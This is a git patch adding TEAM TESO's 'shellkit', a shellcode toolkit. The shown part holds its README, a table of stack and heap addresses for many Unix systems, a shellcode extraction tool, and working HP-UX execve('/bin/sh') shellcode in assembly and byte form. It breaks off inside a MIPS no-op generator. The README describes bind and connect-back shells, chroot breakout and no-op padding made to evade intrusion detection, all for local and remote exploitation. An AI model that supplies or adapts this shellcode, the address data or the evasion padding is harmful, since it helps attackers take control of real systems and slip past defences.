From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/Makefile | 24 ++ other/shellkit/README | 187 +++++++++++ other/shellkit/SYSTEMS | 134 ++++++++ other/shellkit/codedump.c | 93 ++++++ other/shellkit/hppa.c | 12 + other/shellkit/hppa.h | 7 + other/shellkit/hppa.o | Bin 0 -> 8212 bytes other/shellkit/hppa_hpux.c | 36 +++ other/shellkit/hppa_hpux.h | 10 + other/shellkit/hppa_hpux.o | Bin 0 -> 9000 bytes other/shellkit/hppa_hpux/Makefile | 14 + other/shellkit/hppa_hpux/build.sh | 57 ++++ other/shellkit/hppa_hpux/execvesh.s | 36 +++ other/shellkit/hppa_hpux/execvesh.s-backup | 32 ++ other/shellkit/mips.c | 143 +++++++++ other/shellkit/mips.h | 19 ++ other/shellkit/mips.o | Bin 0 -> 13276 bytes other/shellkit/mips_irix.c | 231 ++++++++++++++ other/shellkit/mips_irix.h | 17 + other/shellkit/mips_irix.o | Bin 0 -> 13984 bytes other/shellkit/mips_irix/Makefile | 22 ++ other/shellkit/mips_irix/README | 25 ++ other/shellkit/mips_irix/chmod.s | 49 +++ other/shellkit/mips_irix/chroot.s | 60 ++++ other/shellkit/mips_irix/connectsh.s | 109 +++++++ other/shellkit/mips_irix/execvesh.s | 36 +++ other/shellkit/mips_irix/exit.s | 29 ++ other/shellkit/mips_irix/portshellsh.s | 126 ++++++++ other/shellkit/mips_irix/read.s | 51 +++ other/shellkit/mips_irix/setgid.s | 30 ++ other/shellkit/mips_irix/setreuid.s | 32 ++ other/shellkit/shellcode.c | 61 ++++ other/shellkit/shellcode.h | 62 ++++ other/shellkit/shellcode.o | Bin 0 -> 11192 bytes other/shellkit/shellkit | Bin 0 -> 122697 bytes other/shellkit/shellkit.c | 123 +++++++ other/shellkit/shellkit.h | 31 ++ other/shellkit/sparc.c | 140 ++++++++ other/shellkit/sparc.h | 10 + other/shellkit/sparc.o | Bin 0 -> 13216 bytes other/shellkit/sparc_solaris.c | 58 ++++ other/shellkit/sparc_solaris.h | 6 + other/shellkit/sparc_solaris.o | Bin 0 -> 9628 bytes other/shellkit/sparc_solaris/AUTHORS | 2 + other/shellkit/sparc_solaris/NOTES | 11 + other/shellkit/sparc_solaris/execve.s | 20 ++ other/shellkit/sparc_solaris/exit.s | 10 + other/shellkit/sparc_solaris/setgid.s | 12 + other/shellkit/sparc_solaris/setreuid.s | 14 + other/shellkit/splocoder | Bin 0 -> 16519 bytes other/shellkit/splocoder.c | 184 +++++++++++ other/shellkit/tmp/hpux-tools.tar.gz | Bin 0 -> 2550 bytes other/shellkit/tmp/hpux-tools/Makefile | 5 + other/shellkit/tmp/hpux-tools/README | 10 + other/shellkit/tmp/hpux-tools/sample-one/Makefile | 10 + other/shellkit/tmp/hpux-tools/sample-one/README | 5 + other/shellkit/tmp/hpux-tools/sample-one/exploit.c | 123 +++++++ other/shellkit/tmp/hpux-tools/sample-one/vuln.c | 34 ++ other/shellkit/tmp/hpux-tools/shell-one.s | 39 +++ other/shellkit/tmp/hpux-tools/shell-tree.s | 31 ++ other/shellkit/tmp/hpux-tools/shell-two.s | 41 +++ other/shellkit/tmp/hpux_bof.pdf | Bin 0 -> 243787 bytes other/shellkit/x86.c | 124 ++++++++ other/shellkit/x86.h | 21 ++ other/shellkit/x86.o | Bin 0 -> 12280 bytes other/shellkit/x86_bsd.c | 73 +++++ other/shellkit/x86_bsd.h | 12 + other/shellkit/x86_bsd.o | Bin 0 -> 9768 bytes other/shellkit/x86_bsd/FIXME_chmod.s | 43 +++ other/shellkit/x86_bsd/bindshell.s | 59 ++++ other/shellkit/x86_bsd/connectsh | Bin 0 -> 6100 bytes other/shellkit/x86_bsd/connectsh.s | 51 +++ other/shellkit/x86_bsd/execvesh | Bin 0 -> 6034 bytes other/shellkit/x86_bsd/execvesh.s | 31 ++ other/shellkit/x86_bsd/exit.s | 18 ++ other/shellkit/x86_bsd/spset.s | 36 +++ other/shellkit/x86_linux.c | 352 +++++++++++++++++++++ other/shellkit/x86_linux.h | 32 ++ other/shellkit/x86_linux.o | Bin 0 -> 20216 bytes other/shellkit/x86_linux/AUTHORS | 5 + other/shellkit/x86_linux/chmod.s | 23 ++ other/shellkit/x86_linux/chroot.s | 34 ++ other/shellkit/x86_linux/codedump | Bin 0 -> 6244 bytes other/shellkit/x86_linux/connect.s | 61 ++++ other/shellkit/x86_linux/execve | Bin 0 -> 5988 bytes other/shellkit/x86_linux/execve.s | 22 ++ other/shellkit/x86_linux/exit.s | 14 + other/shellkit/x86_linux/portshell.s | 73 +++++ other/shellkit/x86_linux/portshell_slice.s | 77 +++++ other/shellkit/x86_linux/read.s | 22 ++ other/shellkit/x86_linux/setgid.s | 14 + other/shellkit/x86_linux/setreuid.s | 16 + other/shellkit/x86_linux/setuid.s | 14 + other/shellkit/x86_linux/spset.s | 36 +++ other/shellkit/x86_linux/xor.s | 24 ++ other/shellkit/x86_noptest.c | 25 ++ other/shellkit/x86_solaris/README | 7 + other/shellkit/x86_solaris/bindshell.s | 68 ++++ other/shellkit/x86_solaris/connectsh.s | 60 ++++ other/shellkit/x86_solaris/execve.s | 32 ++ other/shellkit/x86_solaris/exit.s | 24 ++ 101 files changed, 4166 insertions(+) create mode 100644 other/shellkit/Makefile create mode 100644 other/shellkit/README create mode 100644 other/shellkit/SYSTEMS create mode 100644 other/shellkit/codedump.c create mode 100644 other/shellkit/hppa.c create mode 100644 other/shellkit/hppa.h create mode 100644 other/shellkit/hppa.o create mode 100644 other/shellkit/hppa_hpux.c create mode 100644 other/shellkit/hppa_hpux.h create mode 100644 other/shellkit/hppa_hpux.o create mode 100644 other/shellkit/hppa_hpux/Makefile create mode 100644 other/shellkit/hppa_hpux/build.sh create mode 100644 other/shellkit/hppa_hpux/execvesh.s create mode 100644 other/shellkit/hppa_hpux/execvesh.s-backup create mode 100644 other/shellkit/mips.c create mode 100644 other/shellkit/mips.h create mode 100644 other/shellkit/mips.o create mode 100644 other/shellkit/mips_irix.c create mode 100644 other/shellkit/mips_irix.h create mode 100644 other/shellkit/mips_irix.o create mode 100644 other/shellkit/mips_irix/Makefile create mode 100644 other/shellkit/mips_irix/README create mode 100644 other/shellkit/mips_irix/chmod.s create mode 100644 other/shellkit/mips_irix/chroot.s create mode 100644 other/shellkit/mips_irix/connectsh.s create mode 100644 other/shellkit/mips_irix/execvesh.s create mode 100644 other/shellkit/mips_irix/exit.s create mode 100644 other/shellkit/mips_irix/portshellsh.s create mode 100644 other/shellkit/mips_irix/read.s create mode 100644 other/shellkit/mips_irix/setgid.s create mode 100644 other/shellkit/mips_irix/setreuid.s create mode 100644 other/shellkit/shellcode.c create mode 100644 other/shellkit/shellcode.h create mode 100644 other/shellkit/shellcode.o create mode 100644 other/shellkit/shellkit create mode 100644 other/shellkit/shellkit.c create mode 100644 other/shellkit/shellkit.h create mode 100644 other/shellkit/sparc.c create mode 100644 other/shellkit/sparc.h create mode 100644 other/shellkit/sparc.o create mode 100644 other/shellkit/sparc_solaris.c create mode 100644 other/shellkit/sparc_solaris.h create mode 100644 other/shellkit/sparc_solaris.o create mode 100644 other/shellkit/sparc_solaris/AUTHORS create mode 100644 other/shellkit/sparc_solaris/NOTES create mode 100644 other/shellkit/sparc_solaris/execve.s create mode 100644 other/shellkit/sparc_solaris/exit.s create mode 100644 other/shellkit/sparc_solaris/setgid.s create mode 100644 other/shellkit/sparc_solaris/setreuid.s create mode 100644 other/shellkit/splocoder create mode 100644 other/shellkit/splocoder.c create mode 100644 other/shellkit/tmp/hpux-tools.tar.gz create mode 100644 other/shellkit/tmp/hpux-tools/Makefile create mode 100644 other/shellkit/tmp/hpux-tools/README create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/Makefile create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/README create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/exploit.c create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/vuln.c create mode 100644 other/shellkit/tmp/hpux-tools/shell-one.s create mode 100644 other/shellkit/tmp/hpux-tools/shell-tree.s create mode 100644 other/shellkit/tmp/hpux-tools/shell-two.s create mode 100644 other/shellkit/tmp/hpux_bof.pdf create mode 100644 other/shellkit/x86.c create mode 100644 other/shellkit/x86.h create mode 100644 other/shellkit/x86.o create mode 100644 other/shellkit/x86_bsd.c create mode 100644 other/shellkit/x86_bsd.h create mode 100644 other/shellkit/x86_bsd.o create mode 100644 other/shellkit/x86_bsd/FIXME_chmod.s create mode 100644 other/shellkit/x86_bsd/bindshell.s create mode 100644 other/shellkit/x86_bsd/connectsh create mode 100644 other/shellkit/x86_bsd/connectsh.s create mode 100644 other/shellkit/x86_bsd/execvesh create mode 100644 other/shellkit/x86_bsd/execvesh.s create mode 100644 other/shellkit/x86_bsd/exit.s create mode 100644 other/shellkit/x86_bsd/spset.s create mode 100644 other/shellkit/x86_linux.c create mode 100644 other/shellkit/x86_linux.h create mode 100644 other/shellkit/x86_linux.o create mode 100644 other/shellkit/x86_linux/AUTHORS create mode 100644 other/shellkit/x86_linux/chmod.s create mode 100644 other/shellkit/x86_linux/chroot.s create mode 100644 other/shellkit/x86_linux/codedump create mode 100644 other/shellkit/x86_linux/connect.s create mode 100644 other/shellkit/x86_linux/execve create mode 100644 other/shellkit/x86_linux/execve.s create mode 100644 other/shellkit/x86_linux/exit.s create mode 100644 other/shellkit/x86_linux/portshell.s create mode 100644 other/shellkit/x86_linux/portshell_slice.s create mode 100644 other/shellkit/x86_linux/read.s create mode 100644 other/shellkit/x86_linux/setgid.s create mode 100644 other/shellkit/x86_linux/setreuid.s create mode 100644 other/shellkit/x86_linux/setuid.s create mode 100644 other/shellkit/x86_linux/spset.s create mode 100644 other/shellkit/x86_linux/xor.s create mode 100644 other/shellkit/x86_noptest.c create mode 100644 other/shellkit/x86_solaris/README create mode 100644 other/shellkit/x86_solaris/bindshell.s create mode 100644 other/shellkit/x86_solaris/connectsh.s create mode 100644 other/shellkit/x86_solaris/execve.s create mode 100644 other/shellkit/x86_solaris/exit.s (limited to 'other/shellkit') diff --git a/other/shellkit/Makefile b/other/shellkit/Makefile new file mode 100644 index 0000000..ff69bd9 --- /dev/null +++ b/other/shellkit/Makefile @@ -0,0 +1,24 @@ + +#DFLAGS=-O2 +DFLAGS=-g -ggdb +CC=gcc +CFLAGS=$(DFLAGS) -Wall +OBJS= shellcode.o \ + hppa.o hppa_hpux.o \ + mips.o mips_irix.o \ + sparc.o sparc_solaris.o \ + x86.o x86_bsd.o x86_linux.o \ + +all: shellkit splocoder + +clean: + rm -f *.o shellkit + rm -f splocoder + +shellkit: $(OBJS) + $(CC) $(CFLAGS) -o shellkit shellkit.c $(OBJS) + +splocoder: splocoder.c + $(CC) $(CFLAGS) -o splocoder splocoder.c + + diff --git a/other/shellkit/README b/other/shellkit/README new file mode 100644 index 0000000..1c8b252 --- /dev/null +++ b/other/shellkit/README @@ -0,0 +1,187 @@ + +TEAM TESO shellkit - your complete shellcode toolkit +==================================================== +preliminary README file + + +Conditions and rules to be obeyed by the shellcodes +=================================================== + +To construct generic shellcodes one has to state the exact details and +requirements of each shellcode. The list below is what every shellcode within +the shellkit has to obey. + +Conditions the shellcode encounters: + + - Shellcode memory itself is writeable + - No register being properly set except the stack pointer + +Requirements to the shellcode: + + - Do not contain NUL (0x00), line-termination (0x0a, 0x0d) and + format-directive (0x25 = '%') bytes + - Do not expect to be terminated by a NUL ('\0') character + - Working on heap and stack (i.e. any writeable and executeable memory) + +Suggestions (i.e. should be ...): + + - Well tested on most common systems to be expected on the + architecture the shellcode runs on (i.e Solaris 2.[5678] on sparc, + IRIX 5.3, 6.[2345] on mips) + - Optimized for (in order of importance): stability, size + + +Types of shellcodes to create +============================= + +This is a UNIX listing, since most shellcodes are not doable on Windows, so +this listing is for Unix derivates only. For the "configureable" values of the +shellcodes there are setup functions to set the values within the shellcode. + +The listing is split into three different categories: chainables, local and +remote. The chainable codes work as stubs to prepend other shellcodes with. +This is done change certain settings in the environment, such as getting rid of +chroot, certain uid's and the like. The local shellcodes are for use in locally +exploitable vulnerabilities, while the remote shellcodes are designed to assist +you with remote exploitation over the network. + + +Chainables (6 codes) +-------------------- +Chainable shellcodes should not influence the processing of the following +shellcode in violation to the condition above. + + - chrootbreak, which breaks out of a chroot environment if possible on that + architecture (using the best and most promising method) + - read(fd, behind-myself, len), which reads len bytes from fd behind itself + and executes them. on certain architectures special considerations for + cache problems have to be obeyed + - setreuid(?,?), which sets the (e)uid to a configureable value + - setgid(?), which sets the gid to a configurable value + - spset, which sets the stackpointer before the shellcode + + - nop shellcode (see below for description) + +The "nop shellcode" is actually a function that will create a variadic amount +of nop space which is not just one opcode but a mix. This is done to evade IDS +systems. The generated nop-code should behave the same way a normal chainable +shellcode would (i.e. not violating the conditions of the shellcode). + + +Local (2 codes) +--------------- + - chmod/chown/exit, which chowns and chmods a pathname of your choice, then + exits + - execve-sh, which executes a /bin/sh + - exit, which will just exit with an undetermined exit code + + +Remote (2 codes) +---------------- + - portshell-sh, which listens on a defineable port and executes a /bin/sh + once a connection is experienced + - connect-sh, which connects to a defineable ip and port and executes a + /bin/sh once it is connected + + +Architectures +============= + +arch os person(s) +------- --------------- ----------------------------------------- +HPPA HP-UX caddis +MIPS IRIX scut +RS6000 AIX edi +SPARC Solaris caddis, skyper +x86 Solaris plasmoid +x86 Windows NT halvar +x86 Linux lorian, smiler +x86 *BSD dvorak, smiler +------- --------------- ----------------------------------------- + + +Developing +========== + +Please include all custom build utilities, Makefiles (!) and maybe specific +README files in the appropiate directory, so other people can join the fun or +modify the codes at source level. + + +Testing +======= + +The shellcodes have to be tested thoroughly and on as much different systems as +possible. + + +Naming +====== + +Code Strings + + -- + +arch is one of: + + hppa + mips + rs6000 + sparc + x86 + +os is one of: + + aix + bsd + hpux + irix + linux + solaris + windowsnt + +code is one of: + + chmod + chroot + connectsh + execvesh + exit + portshellsh + read + setreuid + setgid + spset + +Example: The portshell shellcode for the MIPS architecture under the IRIX + operating system would be identified with "mips-irix-portshellsh" + + +Additional information +====================== + +Please use the included 'splocoder' utility to dump important system +information of the various architectures. There will be a documentation of what +the fields mean and how they can be used. Soon. + + +Credits +======= + +This shellcode toolkit is the result of the hard work of numerous persons, here +is a list of the persons involved. + +XXX/TODO: update, add missing persons + + acpizer - splocoder + lorian - x86 linux/bsd codes + palmers - x86 linux codes + scut - mips irix, hppa hpux codes, framework and docs + smiler - x86 bsd codes + stealth - x86 bsd codes + + +== +vi:fo=tcrq:tw=79: + + diff --git a/other/shellkit/SYSTEMS b/other/shellkit/SYSTEMS new file mode 100644 index 0000000..33f09af --- /dev/null +++ b/other/shellkit/SYSTEMS @@ -0,0 +1,134 @@ +# splocoder output database -- team teso +# add your system here +# +# thanks to all the people who send me in fingerprints, you know who you are +# :-) + +# BSD systems +FreeBSD-4.2-RELEASE-i386 le stackdown 4 4 + data bss stack env 08049a70 08049c80 bfbffa60 bfbffb64 + M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040 + +FreeBSD-4.3-RC-i386 le stackdown 4 4 + data bss stack env 08049a70 08049c80 bfbffa78 bfbffb7c + M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040 + +FreeBSD-4.3-RELEASE-i386 le stackdown 4 4 + data bss stack env 08049a70 08049c80 bfbffba0 bfbffca4 + M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040 + +NetBSD-1.5-i386 le stackdown 4 4 + data bss stack env 08049dd8 08049fe0 bfbfd614 bfbfdb6c + M: zero neg big small tiny 0805c030 00000000 0805d000 0815d000 0805c040 + +OpenBSD-2.6-i386 le stackdown 4 4 + data bss stack env 000030e8 0000313c dfbfd958 dfbfdeac + M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040 + +OpenBSD-2.8-alpha le stackdown 4 8 + data bss stack env 12001d0d5 12001dff8 1fffff810 1fffff890 + M: zero neg big small tiny 120026060 00000000 120028000 120128000 120026070 + +OpenBSD-2.8-i386 le stackdown 4 4 + data bss stack env 000030ec 00003148 dfbfd658 dfbfdbac + M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040 + +OpenBSD-2.9-i386 le stackdown 4 4 + data bss stack env 000030ec 00003148 dfbfd3dc dfbfd930 + M: zero neg big small tiny 00007030 00000000 00008000 00108000 00007040 + +OpenBSD-2.9-sparc be stackdown 4 4 + data bss stack env 00004110 00004178 f7fff5d8 f7fffb4c + M: zero neg big small tiny 00016030 00000000 00017000 00117000 00016040 + +# HPUX systems +HP-UX-B.10.20-9000/715 be stackup 4 4 + data bss stack env 400010c0 40001188 7b03a530 7b03a3ac + M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260 + +HP-UX-B.10.20-9000/735 be stackup 4 4 + data bss stack env 400010c0 40001188 7b03a590 7b03a414 + M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260 + +# IRIX systems +IRIX-6.5-IP20 be stackdown 4 4 + data bss stack env 100132f8 10013410 7fff2f00 7fff2f6c + M: zero neg big small tiny 10014010 10014020 10014090 10114098 10014030 + +IRIX64-6.5-IP27 be stackdown 4 4 + data bss stack env 100140f8 100141c0 7ffe3e70 7ffe3f1c + M: zero neg big small tiny 10015010 10015020 10015090 10115098 10015030 + +# Linux systems +Linux-2.2.13-i486 le stackdown 4 4 + data bss stack env 080499f0 08049b20 bffff7a8 bffff98c + M: zero neg big small tiny 08049b90 00000000 40117008 08049ba0 08049c08 + +Linux-2.2.19-i586 le stackdown 4 4 + data bss stack env 08049a10 08049b40 bffff3e8 bffff5cc + M: zero neg big small tiny 08049d40 00000000 00227008 08049d50 08049db8 + +Linux-2.2.1-mips le stackdown 4 4 + data bss stack env 10000020 100000d4 7ffffb10 7ffffbdc + M: zero neg big small tiny 10000150 00000000 2ac2d008 10000160 100001c8 + +Linux-2.2.19pre17-i686 le stackdown 4 4 + data bss stack env 080499d0 08049ae0 bffffbac bffffdac + M: zero neg big small tiny 08049b50 00000000 400f3008 08049b60 08049bc8 + +Linux-2.2.19-sparc64 be stackdown 4 4 + data bss stack env 00021ef0 000220e4 effffb68 effffdcc + M: zero neg big small tiny 00022138 00000000 7012e008 00022148 000221b0 + +Linux-2.4.6-i686 le stackdown 4 4 + data bss stack env 08049d50 08049e60 bffff9ac bffffbac + M: zero neg big small tiny 08049ed0 00000000 40142008 08049ee0 08049f48 + +Linux-2.4.7-4GB-i686 le stackdown 4 4 + data bss stack env 08049a4c 08049b60 bfffefac bffff1ac + M: zero neg big small tiny 08049bd0 00000000 40143008 08049be0 08049c48 + +Linux-2.4.4-ppc be stackdown 4 4 + data bss stack env 10010fa8 1001107c 7ffff9d8 7ffffa8c + M: zero neg big small tiny 100111a8 00000000 30028008 100111b8 10011220 + +Linux-2.4.8-sparc64 be stackdown 4 4 + data bss stack env 00021ef0 00022100 effff868 effffacc + M: zero neg big small tiny 00022150 00000000 70170008 + +# alpha +OSF1-V5.0-alpha le stackdown 4 8 + data bss stack env 1400001b8 140000300 11fffbf50 11fffc028 + M: zero neg big small tiny 00000000 00000000 140004000 140002100 140002180 + +# Solaris systems +SunOS-5.6-sun4u be stackdown 4 4 + data bss stack env 00021284 00021470 effff5da effffb54 + M: zero neg big small tiny 00021488 00000000 00021888 00121890 00021498 + +SunOS-5.7-sun4u be stackdown 4 4 + data bss stack env 00021190 00021350 ffbef3a0 ffbef92c + M: zero neg big small tiny 00021368 00000000 00021768 00121770 00021378 + +SunOS-5.8-sun4d be stackdown 4 4 + data bss stack env 00020d10 00021008 dffff3e0 dffff9dc + M: zero neg big small tiny 00021060 00000000 00021460 00121468 00021070 + +SunOS-5.8-sun4m be stackdown 4 4 + data bss stack env 00021180 00021340 effff808 effffd94 + M: zero neg big small tiny 00021358 00021368 00021758 00121760 00021378 + +SunOS-5.8-sun4u be stackdown 4 4 + data bss stack env 00020d00 00020ff4 ffbeefe8 ffbef5e4 + M: zero neg big small tiny 00021050 00021060 00021450 00121458 00021070 + +# exotics +CYGWIN_NT-4.0-1.1.6(0.30/3/2) le stackdown 4 4 + data bss stack env 00402004 0040305c 0240fe34 0a010008 + M: zero neg big small tiny 0a0104c0 0a0104d0 0a0104e0 0a1104e8 0a110550 + +CYGWIN_NT-5.0-1.3.3s(0.44/3/2) le stackdown 4 4 + data bss stack env 00402004 0040305c 0240fe34 0a010008 + M: zero neg big small tiny 0a0104b8 0a0104c8 0a0104d8 0a1104e0 0a110548 + + diff --git a/other/shellkit/codedump.c b/other/shellkit/codedump.c new file mode 100644 index 0000000..9494b9e --- /dev/null +++ b/other/shellkit/codedump.c @@ -0,0 +1,93 @@ +/* shellcode extraction utility, + * by type / teso, small mods by scut. + */ + + +#include +#include +#include + +#ifdef IRIX +#include +#endif + +#ifdef HPUX +extern char * cbegin; +extern char * cend; +#else +extern void cbegin (); +extern void cend (); +#endif + +typedef void (* fptr)(void); + +int +bad (unsigned char u); + + +int +main (int argc, char *argv[]) +{ + int i, + bbytes = 0; + unsigned char * buf = (unsigned char *) cbegin; + + unsigned char ebuf[1024]; + fptr ebuf_p = (fptr) &ebuf[0]; + + + fprintf (stderr, "/* %lu byte shellcode */\n", + (unsigned long int) cend - (unsigned long int) cbegin); + + for (i = 0 ; buf < (unsigned char *) cend; ++buf) { + if (i % 12 == 0 && buf > (unsigned char *) cbegin) + printf ("\n"); + if (i % 12 == 0) + printf ("\""); + + if (bad (*buf & 0xff)) { + printf ("_\\x%02x_", *buf & 0xff); + bbytes += 1; + } else { + printf ("\\x%02x", *buf & 0xff); + } + + if (++i >= 12) { + i = 0; + printf ("\""); + } + } + if (i % 12 == 0) + printf (";\n"); + else + printf ("\";\n"); + + printf("\n"); + + fprintf (stderr, "bad bytes = %d\n", bbytes); + + if (argc > 1) { + memcpy (ebuf, cbegin, (unsigned long int) cend - + (unsigned long int) cbegin); +#ifdef IRIX + memcpy (ebuf + ((unsigned long int) cend - + (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40); + cacheflush (ebuf, sizeof (ebuf), BCACHE); +#endif + ebuf_p (); + } + + exit (EXIT_SUCCESS); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + + diff --git a/other/shellkit/hppa.c b/other/shellkit/hppa.c new file mode 100644 index 0000000..462b017 --- /dev/null +++ b/other/shellkit/hppa.c @@ -0,0 +1,12 @@ +/* hppa.c - generic pa-risc functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "hppa.h" + + + diff --git a/other/shellkit/hppa.h b/other/shellkit/hppa.h new file mode 100644 index 0000000..f325a5f --- /dev/null +++ b/other/shellkit/hppa.h @@ -0,0 +1,7 @@ + +#ifndef HPPA_H +#define HPPA_H + + +#endif + diff --git a/other/shellkit/hppa.o b/other/shellkit/hppa.o new file mode 100644 index 0000000..e54e3fe Binary files /dev/null and b/other/shellkit/hppa.o differ diff --git a/other/shellkit/hppa_hpux.c b/other/shellkit/hppa_hpux.c new file mode 100644 index 0000000..815fdaf --- /dev/null +++ b/other/shellkit/hppa_hpux.c @@ -0,0 +1,36 @@ + +#include +#include +#include +#include "shellcode.h" +#include "hppa.h" + + +/* tested on: HP-UX B.10.20 A 9000/735 + * lsd people used execv, we use execve, which enlarges our code by 12 + * bytes + */ +shellcode hppa_hpux_execvesh = { + "hppa-hpux-execvesh", + 48, + "\xeb\x5f\x1f\xfd\xb4\x16\x70\x76\xb7\x5a\x40\x3a" + "\x0f\xc0\x12\x88\x0f\xda\x12\x80\x0b\xc0\x02\x99" + "\x0b\x18\x02\x98\x22\xa0\x08\x01\xe6\xa0\xe0\x08" + "\x0f\x40\x12\x0e\x2f\x62\x69\x6e\x2f\x73\x68\x41", +}; + + +shellcode * hppa_hpux_shellcodes[] = { + &hppa_hpux_execvesh, + NULL, +}; + +arch hppa_hpux = { + "hppa-hpux", + 4, + NULL /* hppa_nop */, + hppa_hpux_shellcodes, +}; + + + diff --git a/other/shellkit/hppa_hpux.h b/other/shellkit/hppa_hpux.h new file mode 100644 index 0000000..0b53da2 --- /dev/null +++ b/other/shellkit/hppa_hpux.h @@ -0,0 +1,10 @@ + +#ifndef HPPA_HPUX_H +#define HPPA_HPUX_H + +#include "shellcode.h" + +arch hppa_hpux; + +#endif + diff --git a/other/shellkit/hppa_hpux.o b/other/shellkit/hppa_hpux.o new file mode 100644 index 0000000..28141b6 Binary files /dev/null and b/other/shellkit/hppa_hpux.o differ diff --git a/other/shellkit/hppa_hpux/Makefile b/other/shellkit/hppa_hpux/Makefile new file mode 100644 index 0000000..41621dd --- /dev/null +++ b/other/shellkit/hppa_hpux/Makefile @@ -0,0 +1,14 @@ + +#DFLAGS=-O2 +DFLAGS=-g -ggdb +CC=gcc +CFLAGS=$(DFLAGS) -Wall + +all: + $(CC) $(CFLAGS) -o execvesh execvesh.s + +clean: + rm -f *.o + rm -f chmod chroot connectsh execvesh exit portshellsh read \ + setgid setreuid + diff --git a/other/shellkit/hppa_hpux/build.sh b/other/shellkit/hppa_hpux/build.sh new file mode 100644 index 0000000..5a77f25 --- /dev/null +++ b/other/shellkit/hppa_hpux/build.sh @@ -0,0 +1,57 @@ +#!/bin/sh + +#c89 -c -o object.o $1 +#objdump -D cbegin $1 | egrep "[0-9a-f]+:" | cut -c 7- | \ +# awk '{ printf ("\t\"\\x%s\\x%s\\x%s\\x%s\"\t/* %s\t*/\n", \ +# $1, $2, $3, $4, $5 $6 $7 $8 $9) }' > \ +# object.h +#gcc -o $2 ../codedump.c -DHPUX +#rm -f object.h + +# i knew learning awk would repay some day ;-P +objdump -D execvesh | \ +awk ' + function pbyte (CHAR) { + if (match (CHAR, /(00)|(0a)|(0d)|(25)/)) + printf ("_"); + printf ("\\x%s", CHAR); + if (match (CHAR, /(00)|(0a)|(0d)|(25)/)) + printf ("_"); + return; + } + + BEGIN { + foo = 0; + } + + /cbegin/ { + foo = 1; + ccount = 0; + printf ("unsigned char shellcode[] ="); + } + + foo == 1 && /cend/ { + foo = 0; + if (ccount == 0) { + printf (";\n"); + } else { + printf ("\";\n"); + } + } + + foo == 1 && /[0123456789abcdef]+\:/ { + if (ccount == 0) { + printf ("\n\t\""); + } + pbyte($2); + pbyte($3); + pbyte($4); + pbyte($5); + ccount += 4; + + if (ccount == 12) { + ccount = 0; + printf ("\"") + } + }' + diff --git a/other/shellkit/hppa_hpux/execvesh.s b/other/shellkit/hppa_hpux/execvesh.s new file mode 100644 index 0000000..49b1b33 --- /dev/null +++ b/other/shellkit/hppa_hpux/execvesh.s @@ -0,0 +1,36 @@ + + .LEVEL 1.1 + + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + bl cbegin, %r1 + nop + + .align 4 + + .SUBSPA $DATA$ + .EXPORT cbegin + +cbegin + bl moo,%r26 +moo + addi,> 0x3b,%r0,%r22 + addi,< 0x1d,%r26,%r26 + stw %r0,4(%sp) + stw %r26,0(%sp) + xor %r0,%sp,%r25 + xor %r24,%r24,%r24 + + ldil L%0xc0000004,%r21 + ble R%0xc0000004(%sr7,%r21) + stbs %r0,7(%r26) + + .STRING "/bin/sh\x41" + + .EXPORT cend +cend + nop + diff --git a/other/shellkit/hppa_hpux/execvesh.s-backup b/other/shellkit/hppa_hpux/execvesh.s-backup new file mode 100644 index 0000000..c2d3559 --- /dev/null +++ b/other/shellkit/hppa_hpux/execvesh.s-backup @@ -0,0 +1,32 @@ + + .LEVEL 1.1 + + .SPACE $TEXT$ + + .align 4 + .EXPORT cbegin,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR + +cbegin + .PROC + .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3 + + bl moo,%r26 +moo + xor %r25,%r25,%r25 + addi,< 0x11,%r26,%r26 + stbs %r0,7(%r26) + ldil L%0xc0000004,%r21 + ble R%0xc0000004(%sr7,%r21) + ldo 0xb(%r0),%r22 + + .STRING "/bin/sh\x41" + + .PROCEND + + + .EXPORT cend,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR +cend + .PROC + .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3 + + .PROCEND diff --git a/other/shellkit/mips.c b/other/shellkit/mips.c new file mode 100644 index 0000000..dda3f92 --- /dev/null +++ b/other/shellkit/mips.c @@ -0,0 +1,143 @@ +/* mips.c - generic mips functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "mips.h" + +static unsigned long int mips_nop_rwreg (void); +static unsigned long int mips_nop_roreg (void); +static unsigned long int mips_nop_xfer (char *xferstr); + +/* mips generic isa "nop" space generator + */ + +/* get random read write register (i.e. not sp, everything else allowed) + */ +static unsigned long int +mips_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 31); + } while (reg == 29); /* 29 = $sp */ + + return (reg); +} + + +static unsigned long int +mips_nop_roreg (void) +{ + return (random_get (0, 31)); +} + + +static unsigned long int +mips_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned long int tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 5, mips_nop_roreg (), bw); + break; + case ('w'): + BSET 